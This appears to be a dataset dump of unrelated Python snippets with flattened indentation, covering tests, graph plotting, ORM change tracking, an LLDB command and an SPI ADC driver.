recipient_parameters = {'recipient_name': 'Parent Recipient Tester', 'recipient_uei': None, 'parent_recipient_uei': None, 'recipient_unique_id': '123', 'parent_recipient_unique_id': None, 'is_parent_recipient': True}
expected_result = '01c03484-d1bd-41cc-2aca-4b427a2d0611-P'
assert (obtain_recipient_uri(**recipient_parameters) == expected_result)
recipient_parameters = {'recipient_name': 'Parent Recipient Tester', 'recipient_uei': '123', 'parent_recipient_uei': None, 'recipient_unique_id': None, 'parent_recipient_unique_id': None, 'is_parent_recipient': True}
expected_result = 'f5ba3b35-167d-8f32-57b0-406c3479de90-P'
assert (obtain_recipient_uri(**recipient_parameters) == expected_result) |
def test_spec(store: Connection) -> None:
req = request('spec', mode='sign')
r = do_request(store, req)
assert (r == 'signature required'), 'sig required'
r = do_signed(store, req)
assert ('def sign' in r), 'mode=sign'
req = request('spec', mode='verify')
r = do_signed(store, req)
assert ('def verify' in r), 'mode=verify'
req = request('spec', mode='request')
r = do_signed(store, req)
assert ('base64' in r), 'mode=request'
req = request('spec', mode='all')
all_r = do_signed(store, req)
req = request('spec')
r = do_signed(store, req)
assert (all_r == r), 'default behavior'
req = request('spec', mode='asdf')
r = do_signed(store, req)
assert ('please use' in r) |
def create_patch_sequential(ffrom, fto, fpatch, compression, suffix_array_algorithm, data_format, data_segment, use_mmap, heatshrink_window_sz2, heatshrink_lookahead_sz2):
fpatch.write(pack_header(PATCH_TYPE_SEQUENTIAL, compression_string_to_number(compression)))
fpatch.write(pack_size(file_size(fto)))
create_patch_sequential_data(ffrom, fto, fpatch, compression, suffix_array_algorithm, data_format, data_segment, use_mmap, heatshrink_window_sz2, heatshrink_lookahead_sz2) |
def plot_graph(G, ax=None, k=2, pos=None):
if (ax is None):
(env, ax) = plt.subplots(nrows=1, ncols=1)
if (pos is None):
pos = nx.spring_layout(G, k=k)
bbox = dict(facecolor='skyblue', edgecolor='black', boxstyle='round,pad=0.2', alpha=0.5)
labels = nx.draw_networkx_labels(G, pos, bbox=bbox, ax=ax)
for (n, data) in G.nodes(data=True):
facecolor = data['facecolor']
labels[n].get_bbox_patch().set_facecolor(facecolor)
nodes_plt = nx.draw_networkx_nodes(G, pos, node_color='white', node_size=1500, alpha=0, ax=ax)
colors = [data['color'] for (u, v, data) in G.edges(data=True)]
styles = [data['style'] for (u, v, data) in G.edges(data=True)]
alphas = [data['alpha'] for (u, v, data) in G.edges(data=True)]
lines = nx.draw_networkx_edges(G, pos, arrows=True, edge_color=colors, width=0.75, ax=ax)
for (style, alpha, line) in zip(styles, alphas, lines):
line.set_linestyle(style)
line.set_alpha(alpha)
nodes_plt = nx.draw_networkx_nodes(G, pos, node_color='white', node_size=350, alpha=1.0, ax=ax)
root_patch = mpatches.Patch(color='skyblue', label='source')
sink_patch = mpatches.Patch(color='lightgreen', label='sink')
stale_patch = mpatches.Patch(color='lightgrey', label='stale')
node_patch = mpatches.Patch(color='khaki', label='node')
stale_line = Line2D([0], [0], label='stale', color='lightgrey')
cyclic_line = Line2D([0], [0], label='cyclic', color='red')
dag_line = Line2D([0], [0], label='acyclic', color='black')
nondag_line = Line2D([0], [0], label='skipped', color='green', linestyle='dotted')
ax.legend(handles=[root_patch, sink_patch, node_patch, stale_patch, dag_line, cyclic_line, nondag_line, stale_line], ncol=4, prop={'size': 8}, loc='upper center', bbox_to_anchor=(0.5, (- 0.05)), fancybox=True, shadow=True)
return (nodes_plt, lines, labels, pos) |
def list_from_array_of_namedtupes(array_of_namedtupes: Union[(List[Any], NamedTuple)], key, func, join: bool=False) -> Union[(List[Any], str)]:
result = list()
for tup in array_of_namedtupes:
if (key in tup._fields):
result.append(getattr(tup, key))
else:
raise Exception((((("Element '" + key) + "' in '") + func) + "' is not supported"))
return string_from_list_optionally(result, join) |
class TestFuseExpand(unittest.TestCase):
([param(True, 'test_fuse_expand_elementwise_exact'), param(False, 'test_fuse_expand_elementwise_non_exact')])
def test_fuse_expand_elementwise(self, exact_match: bool, name: str):
(N, M) = ((2, 10) if exact_match else (1, 1))
x = Tensor([IntVar([1, 10], name='batch'), 2, 10], is_input=True, name='x')
B = ops.size()(x, 0)
y = Tensor([1, N, M], is_input=True, name='y')
y_expanded = ops.expand()(y, [B, (- 1), (- 1)])
z = ops.elementwise(FuncEnum.ADD)(x, y_expanded)
z._attrs['is_output'] = True
z._attrs['name'] = 'z'
with compile_model(z, detect_target(), './tmp', name) as mod:
self.assertFalse(graph_has_op(mod.debug_sorted_graph, 'expand'))
for batch_size in (1, 5, 10):
x_pt = torch.randn((batch_size, 2, 10)).half().cuda()
y_pt = torch.randn((1, N, M)).half().cuda()
z_pt = (x_pt + y_pt.expand(batch_size, (- 1), (- 1)))
z_ait = torch.empty_like(z_pt)
mod.run_with_tensors({'x': x_pt, 'y': y_pt}, {'z': z_ait})
self.assertTrue(torch.equal(z_ait, z_pt), f'''z_ait={z_ait!r}
z_pt={z_pt!r}''') |
class Operations(object):
def __init__(self):
self.objects = OrderedDict()
def format_key(self, target):
return (target.__class__, identity(target))
def __contains__(self, target):
return (self.format_key(target) in self.objects)
def __setitem__(self, key, operation):
self.objects[key] = operation
def __getitem__(self, key):
return self.objects[key]
def __delitem__(self, key):
del self.objects[key]
def __bool__(self):
return bool(self.objects)
def __nonzero__(self):
return self.__bool__()
def __repr__(self):
return repr(self.objects)
def entities(self):
return set((key[0] for (key, _) in self.iteritems()))
def iteritems(self):
return six.iteritems(self.objects)
def items(self):
return self.objects.items()
def add(self, operation):
self[self.format_key(operation.target)] = operation
def add_insert(self, target):
if (target in self):
self.add(Operation(target, Operation.UPDATE))
else:
self.add(Operation(target, Operation.INSERT))
def add_update(self, target):
state_copy = copy(sa.inspect(target).committed_state)
relationships = sa.inspect(target.__class__).relationships
for (rel_key, relationship) in relationships.items():
if (relationship.direction.name in ['ONETOMANY', 'MANYTOMANY']):
if (rel_key in state_copy):
del state_copy[rel_key]
if state_copy:
self.add(Operation(target, Operation.UPDATE)) |
def remove_vscode_tasks_launch_files(fips_dir, proj_dir, impex, cfg):
for dep_proj_name in reversed(impex):
dep_proj_dir = util.get_project_dir(fips_dir, dep_proj_name)
tasks_path = (dep_proj_dir + '/.vscode/tasks.json')
launch_path = (dep_proj_dir + '/.vscode/launch.json')
if os.path.exists(tasks_path):
log.info(' deleting {}'.format(tasks_path))
os.remove(tasks_path)
if os.path.exists(launch_path):
log.info(' deleting {}'.format(launch_path))
os.remove(launch_path) |
class FBPrintObjectInObjc(fb.FBCommand):
def name(self):
return 'poobjc'
def description(self):
return 'Print the expression result, with the expression run in an ObjC++ context. (Shortcut for "expression -O -l ObjC++ -- " )'
def args(self):
return [fb.FBCommandArgument(arg='expression', help='ObjC expression to evaluate and print.')]
def run(self, arguments, options):
expression = arguments[0]
lldb.debugger.HandleCommand(('expression -O -l ObjC++ -- ' + expression)) |
class Aiterate(Event):
__slots__ = ('_task',)
def __init__(self, ait):
Event.__init__(self, ait.__qualname__)
loop = get_event_loop()
self._task = asyncio.ensure_future(self._looper(ait), loop=loop)
async def _looper(self, ait):
try:
async for args in ait:
self.emit(args)
except Exception as error:
self.error_event.emit(self, error)
self._task = None
self.set_done()
def __del__(self):
if self._task:
self._task.cancel() |
class ADCEntity():
def __init__(self, busnum=0, devnum=0, dtype=3008):
self.busy = False
self.initialized = False
self.busnum = int(busnum)
self.devnum = int(devnum)
self.values = [0, 0, 0, 0, 0, 0, 0, 0, 0]
try:
self.spi = spidev.SpiDev()
self.spi.open(self.busnum, self.devnum)
self.spi.max_speed_hz = 1000000
self.initialized = True
except:
self.initialized = False
self.devnum = (- 1)
self.busnum = (- 1)
self.spi = None
if (dtype == 3008):
self.ADread = self.ADread3008
elif (dtype == 3208):
self.ADread = self.ADread3208
else:
self.ADread = self.ADreadDummy
self.initialized = False
def ADreadDummy(self, channel):
return None
def ADread3008(self, channel):
channel = int(channel)
if ((channel > 7) or (channel < 0)):
return (- 1)
val = self.values[channel]
try:
if self.busy:
time.sleep(0.1)
if (self.busy == False):
self.busy = True
rawData = self.spi.xfer2([1, ((8 + channel) << 4), 0])
val = (((rawData[1] & 3) << 8) + rawData[2])
self.busy = False
self.values[channel] = val
except Exception as e:
self.busy = False
val = (- 1)
return val
def ADread3208(self, channel):
channel = int(channel)
if ((channel > 7) or (channel < 0)):
return (- 1)
val = self.values[channel]
try:
if self.busy:
time.sleep(0.1)
if (self.busy == False):
self.busy = True
rawData = self.spi.xfer2([((4 | 2) | (channel >> 2)), ((channel & 3) << 6), 0])
val = (((rawData[1] & 15) << 8) + rawData[2])
self.busy = False
self.values[channel] = val
except Exception as e:
self.busy = False
val = (- 1)
return val |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.